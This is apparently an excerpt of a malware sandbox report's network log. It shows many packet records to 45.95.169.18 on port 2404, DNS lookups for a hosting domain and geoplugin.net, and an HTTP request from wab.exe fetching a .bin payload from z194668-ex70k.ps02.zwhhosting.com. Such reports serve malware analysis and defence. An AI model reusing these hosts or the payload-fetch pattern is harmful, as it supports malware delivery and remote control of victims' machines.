                                  Aug 29, 2024 12:03:59.601543903 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.601557016 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.601593971 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.601632118 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.601644993 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.601656914 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.601681948 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.601700068 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.601711988 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.601721048 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.601748943 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.601996899 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602020979 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602030993 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602056026 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.602092981 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602102995 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602113962 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602129936 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.602154016 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.602175951 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602188110 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602222919 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.602297068 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602334023 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602346897 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602374077 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.602411985 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602425098 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602437019 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602448940 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602449894 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.602474928 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.602535963 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602546930 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602562904 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602580070 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.602603912 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.602767944 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602781057 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602792025 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602818966 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.602861881 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602878094 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.602914095 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.607486010 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.607497931 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.607510090 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.607521057 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.607546091 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.607558012 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.607743025 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.607754946 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.607765913 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.607786894 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.607793093 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.607795000 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.607942104 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.607954025 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.607965946 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.607976913 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.607979059 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.607991934 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.608006001 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.608006954 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.608033895 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.608066082 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.608078003 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.608088970 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.608100891 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.608103037 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.608113050 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.608124971 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.608129025 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.608138084 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.608150005 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.608155012 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.608174086 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.608498096 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.608516932 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.608530045 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.608561039 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.608599901 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.613013029 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613034010 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613075972 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.613085032 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613153934 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613166094 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613177061 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613188982 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.613229036 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613229036 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.613260031 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613270998 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613297939 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.613451004 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613471031 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613483906 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613507032 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.613533974 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.613595009 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613708019 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613746881 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.613760948 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613773108 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613785982 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613807917 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.613833904 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613847017 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613867044 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613878965 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613883972 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.613892078 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613907099 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.613941908 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.613970995 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613981962 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.613993883 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.614006996 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.614016056 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.614051104 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.614089966 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.614101887 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.614114046 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.614136934 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.616439104 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.616478920 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.616519928 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619097948 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619112015 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619123936 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619175911 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.619175911 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.619180918 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619194031 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619205952 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619218111 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619245052 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.619266987 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.619297981 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619311094 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619323015 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619333982 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619355917 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.619379044 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.619405985 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619453907 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619504929 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.619534016 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619599104 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619611025 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619623899 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.619652033 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.619674921 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.707561016 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707593918 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707603931 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707644939 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.707648993 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707662106 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707705975 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.707791090 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707803011 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707813978 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707828045 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707839012 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.707840919 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707854986 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.707879066 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.707942963 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707954884 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707966089 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707978010 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.707989931 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708002090 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708004951 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.708028078 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.708043098 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.708296061 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708319902 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708331108 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708354950 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.708462954 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708476067 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708501101 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708511114 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.708513975 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708537102 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.708554029 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708564997 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708575964 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708597898 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.708621979 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.708780050 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708803892 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708815098 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708842039 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.708944082 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708960056 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708972931 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708985090 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.708998919 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.709023952 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.709048986 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.709059954 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.709073067 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.709085941 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.709096909 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.709098101 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.709121943 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.709140062 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.709387064 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.709403038 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.709414959 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.709438086 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.709461927 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.709484100 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.709496021 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.709507942 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.709527969 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.709531069 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.709557056 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.709566116 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.712626934 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.712636948 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.712649107 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.712686062 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.712748051 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.712794065 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.712805986 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.712819099 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.712831020 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.712835073 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.712852001 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.712873936 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.712987900 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713000059 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713011026 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713022947 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713036060 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713048935 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.713059902 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.713166952 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713221073 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713232040 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713244915 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.713246107 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713270903 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.713404894 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713418007 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713429928 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713454962 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.713479996 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.713527918 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713542938 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713553905 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713565111 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713577986 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713578939 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.713588953 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:03:59.713604927 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:03:59.713622093 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:04:02.497327089 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:04:02.503472090 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.503488064 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.503494978 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.503499031 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.503597021 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.503597021 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:04:02.503607035 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.503657103 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.503668070 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.503784895 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.503793955 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.508435965 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.508446932 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.508474112 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.508631945 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.508641005 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.508945942 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.508965015 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.598249912 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:04:02.603900909 CEST24044974145.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:02.603956938 CEST497412404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:04:14.392061949 CEST24044974045.95.169.18192.168.2.5
                                  Aug 29, 2024 12:04:14.393738031 CEST497402404192.168.2.545.95.169.18
                                  Aug 29, 2024 12:04:14.398546934 CEST24044974045.95.169.18192.168.2.5
                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 29, 2024 12:03:34.635426044 CEST6236753192.168.2.51.1.1.1
                                  Aug 29, 2024 12:03:35.633133888 CEST6236753192.168.2.51.1.1.1
                                  Aug 29, 2024 12:03:36.627537012 CEST6236753192.168.2.51.1.1.1
                                  Aug 29, 2024 12:03:37.280318975 CEST53623671.1.1.1192.168.2.5
                                  Aug 29, 2024 12:03:37.280343056 CEST53623671.1.1.1192.168.2.5
                                  Aug 29, 2024 12:03:37.287739038 CEST53623671.1.1.1192.168.2.5
                                  Aug 29, 2024 12:03:57.417015076 CEST5413753192.168.2.51.1.1.1
                                  Aug 29, 2024 12:03:57.424583912 CEST53541371.1.1.1192.168.2.5
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Aug 29, 2024 12:03:34.635426044 CEST192.168.2.51.1.1.10xde82Standard query (0)z194668-ex70k.ps02.zwhhosting.comA (IP address)IN (0x0001)false
                                  Aug 29, 2024 12:03:35.633133888 CEST192.168.2.51.1.1.10xde82Standard query (0)z194668-ex70k.ps02.zwhhosting.comA (IP address)IN (0x0001)false
                                  Aug 29, 2024 12:03:36.627537012 CEST192.168.2.51.1.1.10xde82Standard query (0)z194668-ex70k.ps02.zwhhosting.comA (IP address)IN (0x0001)false
                                  Aug 29, 2024 12:03:57.417015076 CEST192.168.2.51.1.1.10xf25cStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Aug 29, 2024 12:03:37.280318975 CEST1.1.1.1192.168.2.50xde82No error (0)z194668-ex70k.ps02.zwhhosting.com118.27.130.234A (IP address)IN (0x0001)false
                                  Aug 29, 2024 12:03:37.280343056 CEST1.1.1.1192.168.2.50xde82No error (0)z194668-ex70k.ps02.zwhhosting.com118.27.130.234A (IP address)IN (0x0001)false
                                  Aug 29, 2024 12:03:37.287739038 CEST1.1.1.1192.168.2.50xde82No error (0)z194668-ex70k.ps02.zwhhosting.com118.27.130.234A (IP address)IN (0x0001)false
                                  Aug 29, 2024 12:03:57.424583912 CEST1.1.1.1192.168.2.50xf25cNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                  • z194668-ex70k.ps02.zwhhosting.com
                                  • geoplugin.net
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549738118.27.130.23480356C:\Program Files (x86)\Windows Mail\wab.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 29, 2024 12:03:37.524830103 CEST198OUTGET /PFaQcsFKEopza178.bin HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                  Host: z194668-ex70k.ps02.zwhhosting.com
                                  Cache-Control: no-cache
                                  Aug 29, 2024 12:03:38.346534967 CEST1236INHTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: application/octet-stream
                                  last-modified: Mon, 26 Aug 2024 01:54:22 GMT
                                  accept-ranges: bytes
                                  content-length: 494656
                                  date: Thu, 29 Aug 2024 10:03:38 GMT
                                  server: LiteSpeed
